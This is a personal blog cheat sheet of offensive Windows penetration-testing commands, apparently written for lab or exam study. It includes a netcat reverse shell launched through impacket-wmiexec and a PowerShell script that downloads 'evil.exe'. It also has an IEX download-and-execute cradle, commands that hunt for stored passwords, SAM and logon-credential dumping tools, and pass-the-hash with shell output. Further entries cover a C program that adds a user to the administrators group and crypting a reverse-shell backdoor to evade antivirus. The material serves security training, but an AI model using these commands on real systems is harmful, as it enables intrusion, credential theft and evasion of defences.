This page looks best with JavaScript enabled

Windows

 ·  ☕ 5 min read  ·  ✍️ Ben Mason

Enumeration

  • enum4linux – script gather information about a window server
  • smbmap – List available shares
  • Find window servers on SUBNET – nbtscan -r SUBNET
  • Basic Info – whoami /all && ipconfig /all && netstat -an && net user && net accounts && net localgroup administrators && net share
  • Test the Guest account

null session

rpcclinet
pre server 2003 server and pre xp sp2
rpcclient -U "" Ipaddress
Blank Password

rpcclient Commands

srvinfo
enumdomusers
getdompwinfo
querydominfo
netshareenum
netshareenumall

net use
net use \\host\IPC$ /u:”” “”

accesschk.exe

accesschk.exe -uwcq * | findstr /v AUTHORITY | findstr /v Administrators

Search common files and registry

iconv -f utf-16le -t utf-8 < win.reg convert reg dump to readable format

dir /s *pass*
dir /s *cred*
dir /s *vnc*
dir /s *.config
type c:\sysprep.inf
type c:\sysprep.xml
unattend.xml / Unattended.xml (passwords remove in workstation, password is on servers)

https://github.com/infosec-au/fuzzdb/blob/master/attack-payloads/lfi/common-windows-files.txt

# The command below will search the file system for file names containing certain keywords. You can
specify as many keywords as you wish.
C:\Windows\system32> dir /s *pass* == *cred* == *vnc* == *.config*

# Search certain file types for a keyword, this can generate a lot of output.
C:\Windows\system32> findstr /si password *.xml *.ini *.txt

# Similarly the two commands below can be used to grep the registry for keywords, in this case "password".
C:\Windows\system32> reg query HKLM /f password /t REG_SZ /s
C:\Windows\system32> reg query HKCU /f password /t REG_SZ /s

Common Command reference

systeminfo | findstr /B /C: – collect OS info
schtasks /query /fo LIST /v – Scheduled tasks
tasklist /SVC – running processes
taskkill /F /PID – kill process
clip – send output to clipboard
cacls – file poermissions (XP / Win7)
dir /r – List alternate data streams
whoami /priv – list all priv
nltest /DCLIST:[domain] – List Domain Controllers
findstr
regedit /e FILENAME dump registry (in UTF-16 format)

net commands

net localgroup group_name UserLoginName /add
net user USERNAME PASSWORD /add
net user USERNAME – user info
net group "Domain Admins" /domain
net localgroup administrators /domain

netsh

netsh advfirewall firewall add rule name="###" dir=in action=allow protocol=TCP localport=###
netsh advfirewall firewall add rule name="###" dir=in action=allow program="SOMETHING.EXE" enable=yes
netsh advfirewall set allprofiles state off

WMIC

I want to mention WMIC (Windows Management Instrumentation Command-Line) separately as it is Windows most useful command line tool. WIMIC can be very practical for information gathering and post-exploitation. That being said it is a bit clunky and the output leaves much to be desired for.

  • XP did not allow access to WMIC from a low privileged account
  • Windows 7 Professional and Windows 8 Enterprise allowed low privilege users by default

Windows wmic command line command

wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic useraccount get /all /format:csv – Get all Local Windows Accounts

impacket-wmiexec testuser:testuser@10.11.1.5 "c:\nc.exe 10.11.0.52 443 -e cmd.exe"

for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A"

wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> out.html
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> out.html
wmic USERACCOUNT list full /format:"%var%" >> out.html
wmic group list full /format:"%var%" >> out.html
wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> out.html
wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> out.html
wmic netuse list full /format:"%var%" >> out.html
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> out.html
wmic startup get Caption,Command,Location,User /format:"%var%" >> out.html
wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" >> out.html
wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> out.html
wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> out.html

CLI Service Management

sc – cmd service management tool

https://ss64.com/nt/sc.html

  • start / stop service ```
    sc stop SERVICE
    sc start SERVICE 
    
`sc query` – list service  
`sc queryex SERVICENAME` – extented serive information

# We can use sc to query, configure and manage windows services.
C:\Windows\system32> sc qc Spooler

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Spooler
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\System32\spoolsv.exe
        LOAD_ORDER_GROUP   : SpoolerGroup
        TAG                : 0
        DISPLAY_NAME       : Print Spooler
        DEPENDENCIES       : RPCSS
                           : http
        SERVICE_START_NAME : LocalSystem

sc config SERVICE_NAME binpath=bin – change service binary path

Powershell

echo COMMAND | powershell -ExecutionPolicy Bypass -NoLogo -NoProfile - – run command not interfactivly

  • Get File or directory permission – Get-ACL {FILE|DIRECTORY} | Fl *
  • Display file – Get-Content {FILENAME}
  • Encode file ```powershell
    $RevShell = Get-Content ./FILENAME - Raw
    $bytes = [System.Test.Encoding]::Unicode.GetBytes($RevShell)
    $Encoded | Out-File NEWFILE.ps1.b64
  • Decode file $Decode = [System.text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($Encoded))
  • ZIP Decompress – Add-Type -Assembly 'system.io.compression.filesystem';[io.compression.zipfile]::ExtractToDirectory("c:\ZIPFILE", 'c:\destination\')
  • List NTFS File stream – Get-Item -Stream * PATH
  • Read NTFS file stream – Get-Content FILENAME -Stream 'STREAMNAME'
  • Set Credentials, run command as user – ```powershell
    $user = “administrator”; $pw = ‘password’; secpw = ConvertTo-SecureString $pw -AsPlainText; $credentail = New-Object System.Management.Automation.PSCredential $user, $secpw
    Invoke-Command -ComputerName COMPUTER -Credential $cred -ScriptBlock { command }
  • download powershell and execute via http – IEX(New-ObjectNet.WebClient).downloadString('URL'))
  • Get auto login password – Get-RegistryAutoLogon
  • Mount share – New-PSDrive -Name "LOCALNAME" -PSProvider "FileSystem" -Root "UCSPATH"
    • To Access – cd LOCALNAME:
  • Set-DomainObjectOwner -Identity DESTUSER -OwnerIdentity SOURCEUSER
  • Add-DomainObjectAcl -TargetIdenttity DESTUSER -PrincipalIdentity SOURCEUSER -Rights ResetPassword -Verbose
  • Set-DomainUserPassword USER -AccountPassword SECURESTRING -Verbose
  • get DLL Version – ```powershell
    $file = Get-Item .\FILE.dll

Windows File transfer

  • tftp was installed by default on windows versions before XP / 2003, dont forget -i on binary files
    • atftpd --daemon --no-fork -v --logfile - /usr/share/windows-binaries/
  • VBscript, utilize script in artifacts directory. Acts like wget (copy in ~/scripts)
  • certutil -urlcache -split -f URL DESTINATIONLOCATION

FTP

  • required interactive shell, won’t work normally on a netcat shell
  • you can use the -s: option to specify file with the list of commands to be executed by the client
OPEN 1.1.1.1
USER offsec
ftp
BIN
GET nc.exe
BYE

File Transfer – Powershell

Paste the following script into the target host adjusting the url to the location of the tool(s), acts as http client

1
2
3
4
5

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1 
echo $url = "http://10.11.0.5/evil.exe" >>wget.ps1 
echo $file = "new-exploit.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

Run Script – powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive - NoProfile -File wget.ps1

  • Encode a PS command to Base64 to avoid escaping quotations
    echo -n PHERSHELLCOMMAND | iconv --to-code UTF-16LE | base64 -w 0
    powershell -EncodedCommand sdfadsfadsfads

vbScript

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);WinHttpReq.Send();BinStream = new ActiveXObject("ADODB.Stream");BinStream.Type = 1;BinStream.Open();BinStream.Write(WinHttpReq.ResponseBody);BinStream.SaveToFile("nc_%s.exe");

debug.exe

  • debug.exe is an assembler, disassembler, hex dump tool in 32 bit windows
  • 64k size limit on file it can create

Process

  • Compress file upx -9 filename created Windows PE binary
  • convert binary to text wine exe2bin.exe file.exe file.txt
  • paste contents for txt file into shell

SMB

smbclient
smbclient //server/Temp mypasswd_here -W domain -u username – connect to share
smbclient -I IP ADDRESS -L DOMAIN -N -U

impacket local SMB server

impacket-smbserver

notes

  • pyinstaller module can be used to make a exe file from a python script
  • icacls used to show windows file permissions

Priv Escalation

windows xp

at 01:58 /interactive cmd.exe – use at to spawn a shell as SYSTEM

Add user to admin group

  • Following C code will add a user to the local admins group on a Windows host
  • should be compured using a windows cross compiler
1
2
3
4
5
6
7

#include <stdlib.h>
int main () 
{
  int i; 
  i = system("net localgroup administrators lowprivuser /add");
  return 0;
}

videos

Password Dumping

  • Passwords stored in the SAM (Security Account Manager)
  • SYSKEY used to encrypt SAM
  • Two hashed
    • LAN Manager (LM) – DES
    • NT LAN Manager (NTLM) – MD4

LM is Weak

  • Passwords longer then 7 Characters split into 2 and can be cracked seperatly
  • Converted to UPPERCASE
  • Does not include a salt
  • LM disavled Vista onwards
  • ‘AAD3B435B51404EEAAD3B435B51404EE’ blank hash

NTLM

  • Case Sensative
  • suppports all Unicode characters
  • does not limit to 7 chars
  • still not salted

usually displayed in LM:NTLM format

SAM files in XP

Main files locates into
C:\windows\system32\config\sam
C:\windows\system32\config\system
Need both to crack hashes

Backups located in
C:\windows\repair\system
C:\windows\repair\sam

fgdump

pwdump and fgdump are used to dump the SAM out of memory.
The SAM files are exclusivly locked in the file system by the OS.

pwdump

fgdump

fgdump/pwdump6 | Foofus.Net

Windows Credentials Editor (WCE)

What is WCE?

  • Tool to manipulate Windows logon sessions–Add, list, delete, modify
  • Obtain credentials associated with logon sessions
    Pass-the-hash (NTLM)
  • Pass-the-ticket (Kerberos)

Supports

  • Windows XP
  • Windows 2003
  • Windows Vista
  • Windows 7
  • Windows 2008

Amplia Security – Research – Windows Credentials Editor (WCE)

wce.exe -w

VNC Passwoird

RealVNC
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver
Value: Password

TightVNC
HKEY_CURRENT_USER\Software\TightVNC\Server
Value: Password or PasswordViewOnly

TigerVNC
HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4
Value: Password

UltraVNC
C:\Program Files\UltraVNC\ultravnc.ini
Value: passwd or passwd2

Read More: Crack or Decrypt VNC Server Encrypted Password • Raymond.CC

GPP

Pass the Hash

  • Fixed or harder in In 8.1 and above

  1. Set the SMBHASH environment variable

    root@kali:~# export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896

  2. run pth-winexe

root@kali:~# pth-winexe -U administrator% //10.11.01.76 cmd 
Password for [WORKGROUP\administrator]:
HASH PASS: Substituting user supplied NTLM HASH...
HASH PASS: Substituting user supplied NTLM HASH... 
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.dw
C:\Windows\system32>

AV avoidance

  • Can test payloads against virustotal.com
  • Methods
    • Encoding Payloads using msfvenom
    • Using binary crypters like Hyperion (windows)
    • Writing your own, or using lesser known examples

Hyperion Example

1
2
3
4
5
6
7
8

root@kali:~# cp shell\_reverse\_msf\_encoded\_embedded.exe backdoor.exe 
root@kali:~# cp /usr/share/windows-binaries/Hyperion-1.0.zip . 
root@kali:~# unzip Hyperion-1.0.zip
root@kali:~# cd Hyperion-1.0/
root@kali:~/Hyperion-1.0# i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe 
root@kali:~/Hyperion-1.0# cp -p /usr/lib/gcc/i686-w64-mingw32/6.1- win32/libgcc\_s\_sjlj-1.dll .  
root@kali:~/Hyperion-1.0# cp -p /usr/lib/gcc/i686-w64-mingw32/6.1-win32/libstdc++- 6.dll .  
root@kali:~/Hyperion-1.0# wine hyperion.exe ../backdoor.exe ../crypted.exe

Exploits

GitHub – ankh2054/python-exploits: Repository for python exploits

# This will only work if both registry keys contain "AlwaysInstallElevated" with DWORD values of 1.

C:\Windows\system32> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
C:\Windows\system32> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

Post exploitation frameworks

Share on
Ben Mason
WRITTEN BY
Ben Mason
Computer Security – Reverse Engineering – Malware – Electronics Hobbyist – Sometimes Photographer – Spaceflight – Cat Enthusiast

See Also